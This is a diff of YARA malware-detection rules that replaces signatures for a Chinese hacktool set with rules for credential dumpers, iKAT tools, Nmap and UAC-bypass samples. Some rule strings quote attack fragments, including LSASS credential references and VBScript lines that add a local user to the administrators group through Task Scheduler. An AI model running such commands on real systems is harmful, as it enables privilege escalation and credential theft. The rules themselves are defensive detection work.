-		uint16( 0 ) == 0x5a4d and filesize <= 400KB and ( 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and all of ( $s* )
 }
-rule SIGNATURE_BASE_Mswin_Check_Lm_Group : FILE
+rule SIGNATURE_BASE_WCE_Modified_1_1014
 {
 	meta:
-		description = "Chinese Hacktool Set - file mswin_check_lm_group.exe"
+		description = "Modified (packed) version of Windows Credential Editor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be17981a-7cbf-55ac-bc81-9330472fc814"
-		date = "2015-06-13"
-		modified = "2021-03-15"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L9-L28"
+		id = "536d1a7f-bda1-5c22-bf72-a177468e7c42"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L738-L752"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367"
-		logic_hash = "74be6bd9c6e01cc4ec7785b6950c8cf6acf549c06990a9d1734f4a3487a04ba7"
+		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
+		logic_hash = "f094d635aabea9b9101fad3d0d23ad37692317ae5b4f636296ee612752c4421f"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." fullword ascii
-		$s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" fullword ascii
-		$s3 = "-D    default user Domain" fullword ascii
-		$fp1 = "Panda Security S.L." ascii wide
+		$s0 = "LSASS.EXE" fullword ascii
+		$s1 = "_CREDS" ascii
+		$s9 = "Using WCE " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 380KB and all of ( $s* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_WAF_Bypass : FILE
+rule SIGNATURE_BASE_Ikat_Wmi_Rundll : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file WAF-Bypass.exe"
+		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d9f40934-873b-5e73-9198-987966027edc"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L30-L48"
+		id = "e3d80c95-d333-53cf-8165-b3a1e66ed00d"
+		date = "2014-05-11"
+		modified = "2025-04-14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L773-L794"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e"
-		logic_hash = "e66d51b465e5d919555084d299a22f07a949a0a9adf4a3f246f6b5222d39b91a"
-		score = 75
+		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
+		logic_hash = "b857e17c790a97468ae69c8cbec6474ee38bea25bb04520516a2603996d4bd41"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Email: blacksplitn@gmail.com" fullword wide
-		$s2 = "User-Agent:" fullword wide
-		$s3 = "Send Failed.in RemoteThread" fullword ascii
-		$s4 = "www.example.com" fullword wide
-		$s5 = "Get Domain:%s IP Failed." fullword ascii
-		$s6 = "Connect To Server Failed." fullword ascii
+		$s0 = "This operating system is not supported." fullword ascii
+		$s1 = "Error!" fullword ascii
+		$s2 = "Win32 only!" fullword ascii
+		$s3 = "COMCTL32.dll" fullword ascii
+		$s4 = "[LordPE]" ascii
+		$s5 = "CRTDLL.dll" fullword ascii
+		$s6 = "VBScript" fullword ascii
+		$s7 = "CoUninitialize" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7992KB and 5 of them
+		all of them and filesize < 15KB
 }
-rule SIGNATURE_BASE_Guilin_Veterans_Cookie_Spoofing_Tool : FILE
+rule SIGNATURE_BASE_Ikat_Revelations
 {
 	meta:
-		description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe"
+		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "13f78e0b-c975-5879-9af1-8c619d6c94a9"
-		date = "2015-06-13"
-		modified = "2023-01-27"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L50-L67"
+		id = "c5ef2c2a-c9c0-5c3a-bbcc-0b0949527850"
+		date = "2014-05-11"
+		modified = "2025-04-14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L796-L813"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1"
-		logic_hash = "5fd136f44ebce28db4f77f2f8730eb67fc4c2d58921b73378b8d87e1444a4b67"
+		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
+		logic_hash = "0f3aa9e784beb7de8b560ecde8cc06d49e07f5e4ea4acb233ec9ac007179d7a3"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "kernel32.dll^G" fullword ascii
-		$s1 = "\\.Sus\"B" ascii
-		$s4 = "u56Load3" fullword ascii
-		$s11 = "O MYTMP(iM) VALUES (" ascii
+		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
+		$s8 = "BETAsupport@snadboy.com" fullword wide
+		$s9 = "support@snadboy.com" fullword wide
+		$s14 = "RevelationHelper.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1387KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Marathontool : FILE
+rule SIGNATURE_BASE_Ikat_Priv_Esc_Tasksch
 {
 	meta:
-		description = "Chinese Hacktool Set - file MarathonTool.exe"
+		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
 		author = "Florian Roth (Nextron Systems)"
-		id = "23513361-ecac-5ddb-92b9-4dd8da12e8db"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L69-L84"
+		id = "0786b313-3154-536b-b7eb-c4d8444a309f"
+		date = "2014-05-11"
+		modified = "2025-04-14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L815-L841"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "084a27cd3404554cc799d0e689f65880e10b59e3"
-		logic_hash = "2d52d640ef44d933791d1da0d1263dba15702180c730500e04d364dd6b4d6081"
+		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
+		logic_hash = "6d0f755a758aaac4328f5f4343b424c03c2751ddad6a1dbe7c0332171c027945"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "MarathonTool" ascii
-		$s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii
-		$s18 = "SELECT UNICODE(SUBSTRING((system_user),{0},1))" fullword wide
+		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
+		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
+		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
+		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
+		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
+		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
+		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
+		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
+		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
+		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
+		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
+		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii
+		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1040KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_PLUGIN_Trackid : FILE
+rule SIGNATURE_BASE_Ikat_Command_Lines_Agent
 {
 	meta:
-		description = "Chinese Hacktool Set - file TracKid.dll"
+		description = "iKAT hack tools set agent - file ikat.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8dd77df1-748e-5778-be40-38b794c74b97"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L86-L104"
+		id = "35068d59-272d-55a6-b211-2c138276914c"
+		date = "2014-05-11"
+		modified = "2025-04-14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L843-L864"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09"
-		logic_hash = "a62112dbf2ef696e4eb7f6787a0e0930c29d9834f46c87493954498fa4b375f6"
+		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
+		logic_hash = "a39f8e388aa11c732156753f4a19aa9cc3ccd0437de30cdcc608926320a089b0"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "E-mail: cracker_prince@163.com" fullword ascii
-		$s1 = ".\\TracKid Log\\%s.txt" fullword ascii
-		$s2 = "Coded by prince" fullword ascii
-		$s3 = "TracKid.dll" fullword ascii
-		$s4 = ".\\TracKid Log" fullword ascii
-		$s5 = "%08x -- %s" fullword ascii
+		$s0 = "Extended Module: super mario brothers" fullword ascii
+		$s1 = "Extended Module: " fullword ascii
+		$s3 = "ofpurenostalgicfeeling" fullword ascii
+		$s8 = "-supermariobrotheretic" fullword ascii
+		$s9 = "!http://132.147.96.202:80" fullword ascii
+		$s12 = "iKAT Exe Template" fullword ascii
+		$s15 = "withadancyflavour.." fullword ascii
+		$s16 = "FastTracker v2.00   " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Pc_Pc2015 : FILE
+rule SIGNATURE_BASE_Ikat_Cmd_As_Dll
 {
 	meta:
-		description = "Chinese Hacktool Set - file pc2015.exe"
+		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa7c0b5e-91c3-52cc-9e06-b4648d0b8825"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L106-L121"
+		id = "8d15b4b6-25f3-556c-bfa8-eba503c9c649"
+		date = "2014-05-11"
+		modified = "2025-04-14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L866-L884"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "de4f098611ac9eece91b079050b2d0b23afe0bcb"
-		logic_hash = "34d66d8b9e637c067ec2d9387b7b57458312d75892e33b95eb1095200799cf3b"
-		score = 75
+		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
+		logic_hash = "3f8390fb6eb16749e63379222a5899b811e7ccd6b3b219b60d7a621fd4595e7b"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\svchost.exe" ascii
-		$s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" fullword ascii
-		$s8 = "%s%08x.001" fullword ascii
+		$s1 = "cmd.exe" fullword wide
+		$s2 = "ReactOS Development Team" fullword wide
+		$s3 = "ReactOS Command Processor" fullword wide
+		$ext = "extension: .dll" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 309KB and all of them
+		all of ( $s* ) and $ext
 }
-rule SIGNATURE_BASE_Sekurlsa : FILE
+rule SIGNATURE_BASE_Ikat_Tools_Nmap
 {
 	meta:
-		description = "Chinese Hacktool Set - file sekurlsa.dll"
+		description = "Generic rule for NMAP - based on NMAP 4 standalone"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b65dc578-e5a1-57e6-bd98-2c45cd07e857"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L123-L139"
+		id = "be4858e6-a8f3-55eb-9c04-f4def838dde1"
+		date = "2014-05-11"
+		modified = "2025-04-14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L886-L903"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
-		logic_hash = "dea05c7f19a834cc936c452ca2f6f4286e6c3dae002747c27913960199451c3f"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
+		logic_hash = "f538d807ed4904a2c321385a095a97bc0d718349f7eb31a367e521228412cef2"
+		score = 50
+		quality = 83
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Bienvenue dans un processus distant" fullword wide
-		$s2 = "Format d'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur" wide
-		$s3 = "SECURITY\\Policy\\Secrets" fullword wide
-		$s4 = "Injection de donn" fullword wide
+		$s0 = "Insecure.Org" fullword wide
+		$s1 = "Copyright (c) Insecure.Com" fullword wide
+		$s2 = "nmap" fullword nocase
+		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1150KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Mysqlfast : FILE
+rule SIGNATURE_BASE_Ikat_Startbar
 {
 	meta:
-		description = "Chinese Hacktool Set - file mysqlfast.exe"
+		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "93ee91cd-a6b8-5ed9-b750-779f88032be6"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L141-L159"
+		id = "f29f15e9-aa29-519a-b4ad-c018aac68fd6"
+		date = "2014-05-11"
+		modified = "2025-04-14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L905-L925"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "32b60350390fe7024af7b4b8fbf50f13306c546f"
-		logic_hash = "3ea75954831e705d0d25efa115288e66868d9b814f0990fd048bbe1209a8d933"
-		score = 75
+		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
+		logic_hash = "adb29d4903a771b0dab9dee8313878757ff12fc014da86291e32eb3ec60bf551"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Invalid password hash: %s" fullword ascii
-		$s3 = "-= MySql Hash Cracker =- " fullword ascii
-		$s4 = "Usage: %s hash" fullword ascii
-		$s5 = "Hash: %08lx%08lx" fullword ascii
-		$s6 = "Found pass: " fullword ascii
-		$s7 = "Pass not found" fullword ascii
+		$s2 = "Shinysoft Limited1" fullword ascii
+		$s3 = "Shinysoft Limited0" fullword ascii
+		$s4 = "Wellington1" fullword ascii
+		$s6 = "Wainuiomata1" fullword ascii
+		$s8 = "56 Wright St1" fullword ascii
+		$s9 = "UTN-USERFirst-Object" fullword ascii
+		$s10 = "New Zealand1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Dtools2_02_Dtools : FILE
+rule SIGNATURE_BASE_Ikat_Tool_Generic
 {
 	meta:
-		description = "Chinese Hacktool Set - file DTools.exe"
+		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fc812797-12d8-596a-8ebe-dd8b0d7a4b7e"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L161-L179"
+		id = "a8064a26-09c0-59f1-bdf9-628a445014ff"
+		date = "2014-05-11"
+		modified = "2025-04-14"
+		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L927-L953"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9f99771427120d09ec7afa3b21a1cb9ed720af12"
-		logic_hash = "51e30d39f388546ac233b4b97a38f225c90d2f006bc509dd7eecfb408aef9be5"
-		score = 75
+		logic_hash = "5c5aa2d7d82d4b65541c5b6bcae6260fdaed0030493ed689363722cd78fd0a26"
+		score = 55
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
+		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
+		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
 
 	strings:
-		$s0 = "kernel32.dll" ascii
-		$s1 = "TSETPASSWORDFORM" fullword wide
-		$s2 = "TGETNTUSERNAMEFORM" fullword wide
-		$s3 = "TPORTFORM" fullword wide
-		$s4 = "ShellFold" fullword ascii
-		$s5 = "DefaultPHotLigh" fullword ascii
+		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
+		$s1 = "Failed to read the entire file" fullword
+		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
+		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
+		$s9 = "Running Zip pipeline..." fullword
+		$s10 = "<FinTitle />" fullword
+		$s12 = "<AutoTemp>0</AutoTemp>" fullword
+		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
+		$s15 = "AES Encrypting..." fullword
+		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Dll_Packetx : FILE
+rule SIGNATURE_BASE_Bypassuac2
 {
 	meta:
-		description = "Chinese Hacktool Set - file PacketX.dll - ActiveX wrapper for WinPcap packet capture library"
-		author = "Florian Roth (Nextron Systems)"
-		id = "19ab5977-934d-5e3f-8bba-925bb57bf486"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L181-L196"
+		description = "Auto-generated rule - file BypassUac2.zip"
+		author = "yarGen Yara Rule Generator"
+		id = "8b7e49de-9b0a-5dc4-86af-1a854dc649cc"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L955-L967"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3f0908e0a38512d2a4fb05a824aa0f6cf3ba3b71"
-		logic_hash = "161d174376c599b1b794fa1174349ae12b198842d89769baec4b9664729a3983"
-		score = 50
+		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
+		logic_hash = "398783fa0453a60fd1c6aa64eacfbfa7c5385e81c79d1b6a8a8386dae9b825cc"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s9 = "[Failed to load winpcap packet.dll." wide
-		$s10 = "PacketX Version" wide
+		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
+		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
+		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1920KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Sqldbx_Zhs : FILE
+rule SIGNATURE_BASE_Bypassuac_3
 {
 	meta:
-		description = "Chinese Hacktool Set - file SqlDbx_zhs.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "31c49755-f1bd-5ecb-91ff-1040e40983ab"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L198-L217"
+		description = "Auto-generated rule - file BypassUacDll.dll"
+		author = "yarGen Yara Rule Generator"
+		id = "407a8e12-1160-584d-94c8-7aa78e29c754"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L969-L982"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e34228345498a48d7f529dbdffcd919da2dea414"
-		logic_hash = "b0215d29c58c252c1717f08135eab65794a99ed669c2225bcba690ae7d7a034c"
+		hash = "1974aacd0ed987119999735cad8413031115ce35"
+		logic_hash = "cf3183ff4562f2962f87bc594c1710c73c113fa1d49fa56f7a3ff391ba4b9003"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 60
+		tags = ""
 
 	strings:
-		$s0 = "S.failed_logins \"Failed Login Attempts\", " fullword ascii
-		$s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" fullword ascii
-		$s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii
-		$s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii
-		$s11 = "L.login_policy_name AS \"Login Policy\", " fullword ascii
-		$s12 = "mailto:support@sqldbx.com" fullword ascii
-		$s15 = "S.last_login_time \"Last Login\", " fullword ascii
+		$s0 = "BypassUacDLL.dll" fullword wide
+		$s1 = "\\Release\\BypassUacDll" ascii
+		$s3 = "Win7ElevateDLL" fullword wide
+		$s7 = "BypassUacDLL" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		3 of them
 }
-rule SIGNATURE_BASE_Ms10048_X86 : FILE
+rule SIGNATURE_BASE_Bypassuacdll_6
 {
 	meta:
-		description = "Chinese Hacktool Set - file ms10048-x86.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "373f0419-5a7d-5f01-968c-5d3e7b1c0670"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L219-L237"
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		id = "5be27053-446f-5ea3-a242-2661aeffa3df"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1000-L1011"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
-		logic_hash = "50e45cae87f5d1cc4903a16f9283dd751d90cde0c71f3124467b4ff15bd34f1b"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
+		logic_hash = "3cb89875ddf79a3709aeb58149e228e03b9fb43fa1565aab5ece743857b4cc71"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "[ ] Resolving PsLookupProcessByProcessId" fullword ascii
-		$s2 = "The target is most likely patched." fullword ascii
-		$s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." fullword ascii
-		$s4 = "[ ] Creating evil window" fullword ascii
-		$s5 = "%sHANDLEF_INDESTROY" fullword ascii
-		$s6 = "[+] Set to %d exploit half succeeded" fullword ascii
+		$s3 = "BypassUacDLL.dll" fullword wide
+		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Dos_Ch : FILE
+rule SIGNATURE_BASE_Bypassuac_EXE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ch.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2e8319de-fe54-5083-968c-4707d127f072"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L239-L257"
+		description = "Auto-generated rule - file BypassUacDll.aps"
+		author = "yarGen Yara Rule Generator"
+		id = "b88aded5-7dfb-5cdf-bb42-cd8b069259e0"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1013-L1027"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7"
-		logic_hash = "49ab2c75267c2ed5c15c8fbdc6fa0f8826f6e7a45a2861d6ba4b293ffca6bcd6"
+		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
